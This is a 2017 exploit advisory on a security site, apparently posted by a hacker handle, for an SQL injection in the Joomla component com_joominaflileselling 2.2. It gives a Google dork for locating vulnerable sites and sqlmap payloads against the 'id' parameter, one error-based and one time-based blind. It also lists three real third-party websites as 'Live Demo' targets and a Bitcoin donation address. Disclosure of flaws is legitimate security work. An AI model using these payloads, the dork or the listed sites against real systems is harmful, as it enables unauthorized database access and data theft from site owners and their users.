Joomla com_joominaflileselling 2.2 SQL injection Vulnerability

2017.02.11
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:index.php?option=com_joominaflileselling

############################## # [xBADGIRL21] # # [N3W PUBLIC 3XPL0IT] # # _,________ # # 0day _T _==____() -- # # /##(_)-' # # /##/ # # x21 # ############################## # Exploit Title : Joomla com_joominaflileselling 2.2 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_joominaflileselling # Vendor Homepage : http://www.joomina.ir by amirrezatehrani # Link : https://goo.gl/uk4Cdj # version : 2.2 # Tested on: [Parrot OS security] # MyBlog : http://xbadgirl21.blogspot.com/ # Date: 10-02-2017 # video Proof : https://youtu.be/lDBVqeE_jlU [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz ###################### # [+] DESCRIPTION : ###################### # [+] JoominaFlileSelling Created on 12-Mar-2015 and it's # [+] an component to help you easily to sell your files on your site in a secure manner # [+] and it the most powerful plugin files at one time sale # [+] AND an SQL injection has been Detected in this Joomla components joominaflileselling ###################### # [+] Poc : ###################### # [id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/?option=com_joominaflileselling&view=joominafilesellpay&id=3 ###################### # [+] SQLmap PoC: ###################### #Parameter: id (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: option=com_joominaflileselling&view=joominafilesellpay&id=3' AND (SELECT 2816 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT ( # ELT(2816=2816,1))),0x7178707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BIhg'='BIhg # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_joominaflileselling&view=joominafilesellpay&id=3' AND SLEEP(5) AND 'xqDx'='xqDx # --- # GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [!] Live Demo : ###################### # http://cgsample.com/?option=com_joominaflileselling&view=joominafilesellpay&id=3 # http://www.parsiweb24.ir/book/index.php?option=com_joominaflileselling&view=dargahpardakht&id=1 # http://azemun.ir/?option=com_joominaflileselling&view=joominafilesellpay&id=3 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/lDBVqeE_jlU


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top